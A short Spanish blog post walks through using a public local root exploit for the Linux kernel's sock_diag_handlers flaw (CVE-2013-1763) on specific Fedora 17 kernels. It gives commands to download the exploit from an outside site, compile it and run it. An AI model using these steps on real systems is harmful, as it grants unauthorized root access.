Hace unos días se hizo publico un exploit que tenía unos meses ya funcionando, hasta que alguien lo hizo publico en Pastebin, en está ocasión lo pruebo, a pesar de que dice afectar las versiones del kernel del 3.3 a 3.8, no es del todo cierto.
La instalación por defecto de Fedora 17, tiene una versión del kernel NO vulnerable, la versión de Fedora 18 ya viene con una versión de Kernel superior a 3.8. Así que solo funciona con ciertas actualizaciones en Fedora 17.
La vulnerabilidad permite escalar privilegios a través de sock_diag_handlers[], las versiones exactas de Fedora que son vulnerables son:
- 00 Fedora Core 17 3.4.4-3.fc17.i686 #1
- 01 Fedora Core 17 3.5.2-3.fc17.i686 #1
- 02 Fedora Core 17 3.5.5-2.fc17.i686 #1
Para rootear estas versiones hacemos lo siguiente:
Descargamos el exploit, en una terminal ejectutamos:
wget http://xora.org/root/[2013]-sock_diag_handlers-3.3-3.79.zipMirror: http://xora.org/root
Extraemos y entramos a la carpeta
unzip [2013]-sock_diag_handlers-3.3-3.79.zip cd [2013]-sock_diag_handlers-3.3-3.79
Para compilar necesitamos gcc, si no lo tienes instalado:
sudo yum install gcc
y ahora compilamos
make
y ejecutamos
./woopme 00
Sustituye 00 por la versión correspondiente [00, 01, 02]
Más información en:
- CVE-2013-1763 sock_diag_handlers Local Root Exploit Analysis
- Archlinux x86-64 3.3.x-3.7.x x86-64 sock_diag_handlers[] Local Root
Post para xora.org & evafedora.org.